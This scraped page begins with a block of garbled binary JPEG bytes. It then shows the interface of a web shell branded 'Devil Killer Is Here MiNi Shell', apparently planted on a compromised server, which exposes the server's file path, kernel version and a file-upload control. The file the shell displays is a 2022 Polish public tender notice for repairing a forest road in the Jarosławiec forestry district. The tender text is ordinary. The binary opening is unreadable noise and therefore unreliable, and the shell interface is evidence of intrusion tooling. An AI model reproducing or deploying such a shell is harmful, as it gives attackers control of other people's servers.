JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221103/0042223801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi leśnej w leśnictwie Jarosławiec 0201 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Strzelce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110016906</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grabowiecka 20A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hrubieszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 568 32 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">strzelce@lublin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://strzelce.lublin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi leśnej w leśnictwie Jarosławiec 0201 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d5b55752-5a9d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00422238</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00194383/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont drogi leśnej w leśnictwie Jarosławiec 0201</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d5b55752-5a9d-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej:<br/>a) przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl<br/>lub<br/>b) poczty elektronicznej Zamawiającego pod adresem: strzelce@lublin.lasy.gov.pl<br/>z zastrzeżeniem, iż ofertę i załączniki wraz z ofertą należy złożyć wyłączenie za pośrednictwem Platformy e –Zamówienia (ppkt a).<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu Wykonawca na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce Centrum Pomocy.<br/>https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d5b55752-5a9d11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.Wymagania techniczne<br/>iorganizacyjne wysłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci<br/>papierowej(elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z e-zamówienia oraz Regulaminie ePUAP. .Ofertę sporządza się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.Sposób<br/>sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>z dnia 30.12.2021 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r., 2452).<br/>Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu ezmowienia, https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d5b55752-5a9d11ed-9171-f6b7c7d59353<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej strzelce@lublin.lasy.gov.pl z zastrzeżeniem, że złożenie oferty nastąpi za pomocą ezamowienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż<br/>administratorem danych osobowych jest Nadleśnictwo Strzelce. W sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się za pośrednictwem poczty elektronicznej pod adresem strzelce@lublin.lasy.gov.pl lub telefonicznie pod numerem<br/>82 568 32 10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 334777,34 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Remont drogi leśnej leśnictwa Jarosławiec 060402L .Remont polegał będzie na : <br/>a)	Odcinkowej i punktowej wymianie zniszczonych płyt oraz ich korekcie w przekroju poprzecznym i profilu podłużnym poprzez wbudowanie nowych płyt (835,5 m2 )oraz płyt z odzysku (836,25m2 ).<br/>b)	Wykonaniu płyt jako uzupełnienie istniejącej szczeliny pomiędzy płytami w km 2+417 strona praw 0,5m2 oraz w km 2+588 strona lewa 0,5m2,<br/>c)	Wykonanie nowej podbudowy z kruszywa łamanego 0-31,5mm (1672,75m2 ),<br/>d)	Lokalnym uzupełnieniu poboczy gruntowych o szerokości 0,5 m oraz przestrzeni pomiędzy płytami.<br/>Reszta szczegółów dotycząca zakresu robót jak również parametrów przedmiotu niniejszego postępowania znajduje się w przedmiarze robót budowlanych będącym złącznikiem do SWZ.<br/><br/>2.	Użyte w opisie przedmiotu zmówienia nazwy własne nie mają na celu naruszenia art.16 i 99 ustawy Pzp, a jedynie precyzują oczekiwania jakościowe i technologiczne Zamawiającego. Zamawiający dopuszcza możliwość zastosowania innych materiałów, pod warunkiem zapewnienia parametrów nie gorszych niż określone w opisie przedmiotu zamówienia<br/>We wszystkich miejscach SWZ i załącznikach do SWZ, w których użyto przykładowego znaku towarowego, patentu, pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę lub jeżeli Zamawiający opisał przedmiot zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 Pzp a w każdym przypadku, działając zgodnie z art. 99 ust. 6 i art. 101 ust 4 Pzp – Zamawiający dopuszcza rozwiązania równoważne w stosunku do określonych w SWZ i dokumentacji przetargowej, oznaczając takie wskazania lub odniesienia odpowiednio wyrazami „lub równoważny” lub „lub równoważne”, pod warunkiem zapewnienia parametrów nie gorszych niż określone w opisie przedmiotu zamówienia. Rozwiązanie równoważne jest także dopuszczalne w sytuacji, gdyby wyraz „równoważny” lub „równoważne” nie znalazło się w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt<br/>7) Pzp w okresie 3 lat od daty zamówienia podstawowego w wymiarze nie więcej niż 40%<br/>wartości zamówienia podstawowego dotychczasowemu Wykonawcy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie brał pod uwagę dwa kryteria oceny:<br/>1)	Cena – 60 %, <br/>2) Samodzielna realizacja zamówienia – 40 %.<br/><br/>Przyjęta metoda przyznawania punktów – polegać będzie na ocenie każdej oferty wg 100 punktowej skali, przy czym oferta najkorzystniejsza otrzymuje 100 punktów. <br/><br/>Każda inna oferta otrzymuje proporcjonalnie mniejszą ilość punktów.<br/><br/>Dla kryterium „cena” zostanie zastosowany następujący wzór:<br/><br/> cena oferty z najniższą ceną<br/> ------------------------------------ x 100 pkt x 0,6<br/> cena oferty badanej<br/><br/> Dla kryterium „samodzielna realizacja zamówienia” oceniane będzie przyjęcie przez Wykonawcę zobowiązania umownego do wykonania zamówienia, określonych przez Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez udziału podwykonawców. Zasady realizacji tego zobowiązania oraz zasady odpowiedzialności za jego niewykonanie zostały opisane we wzorze umowy (stanowiącym załącznik nr 7 do SWZ). We wzorze umowy zobowiązanie do wykonania zamówienia określonych przez Zamawiającego w SWZ, samodzielnie przez Wykonawcę składającego ofertę, tj. bez udziału podwykonawców jest określone jako „Obowiązek Samodzielnej Realizacji”. <br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do samodzielnej realizacji zamówienia w Ofercie (załącznik nr 1 do SWZ). Brak wskazania w Ofercie przyjęcia przez Wykonawcę zobowiązania, o którym mowa w zdaniu poprzednim będzie uznane jako nieprzyjęcie takiego zobowiązania, a Oferta Wykonawcy uzyska 0 pkt w ramach niniejszego kryterium oceny ofert. Oferta Wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">samorealizacja zadania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał w<br/>sposób należyty, co najmniej 2 roboty budowlane odpowiadające swoim rodzajem<br/>robotom stanowiącym przedmiot zamówienia (przez robotę budowlaną rozumie się<br/>wykonywanie prac na podstawie 1 umowy, polegające na remoncie dróg) o wartości<br/>nie mniejszej niż: 150.000 zł (brutto) każda <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy<br/>w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej, albo oświadczenie o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 8 do SWZ);<br/>2) informacji z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, dotyczącej<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego - wystawionej nie wcześniej niż 6 miesięcy przed<br/>jej złożeniem;<br/>3) odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie<br/>art. 109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu<br/>do rejestru lub ewidencji;<br/>4) zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust.1 pkt 1 Pzp wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania<br/>z opłaceniem podatków i opłat wraz z zaświadczeniem dokumenty potwierdzające, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych podatków wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności,;<br/>5) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego<br/>Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w<br/>przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem dokumenty potwierdzające, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności;<br/>6) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP, w zakresie<br/>podstaw wykluczenia z postępowania określonych w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP dotyczących<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP dotyczących<br/>zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6 PZP, e) art. 109 ust.<br/>1 pkt 1 i 7 PZP - (wzór oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust.<br/>1 PZP w zakresie podstaw wykluczenia z postępowania stanowi załącznik nr 10 do SWZ).<br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w podpunkcie:<br/>- 2 – składa inf. z rejestru, tj. sądowy, albo, w przypadku braku rejestru, inny równoważny dokument wydany przez właściwy organ<br/>sądowy lub administracyjny kraju, w trym wykonawca ma siedzibę lub miejsce zamieszkania (wystawiony nie wcześniej niż 6<br/>miesięcy przed jego złożeniem); - 3, 4 i 5 - składa dokument wystaw. w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że: - nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne (wystawione nie wcześniej niż 3 miesięcy przed ich złożeniem);, - nie otwarto jego likwidacji ani nie ogłoszono upadłości,<br/>jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury (wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy te ostały wykonane, (zał. nr 3) ) wraz z załączeniem dowodów, określających, czy roboty te zostały wykonane należycie. Dowodami, o których mowa powyżej są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. Wykaz ten powinien zawierać co najmniej 2 roboty budowlane w zakresie remontu dróg, zrealizowane w okresie ostatnich pięciu lat o wartości minimum: 100.000 zł brutto każda.<br/><br/>2)	Wykaz osób skierowanych przez Wykonawcę do realizacji podmiotowego zamówienia w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z podaniem ich imion i nazwisk oraz informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakres wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zał.nr 4). <br/><br/>6. Wykonawca może polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów (wg załącznika nr 5 do SWZ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie, odpowiedniego zasobu oraz wskazywać:<br/>-	zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>-	sposób i okres udostępniania wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia ,<br/>-	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje roboty budowlane lub usługi których wskazane zdolności dotyczą. <br/>Zamawiający ocenia, czy udostępnione Wykonawcy przed podmioty udostępniające zasoby zdolności 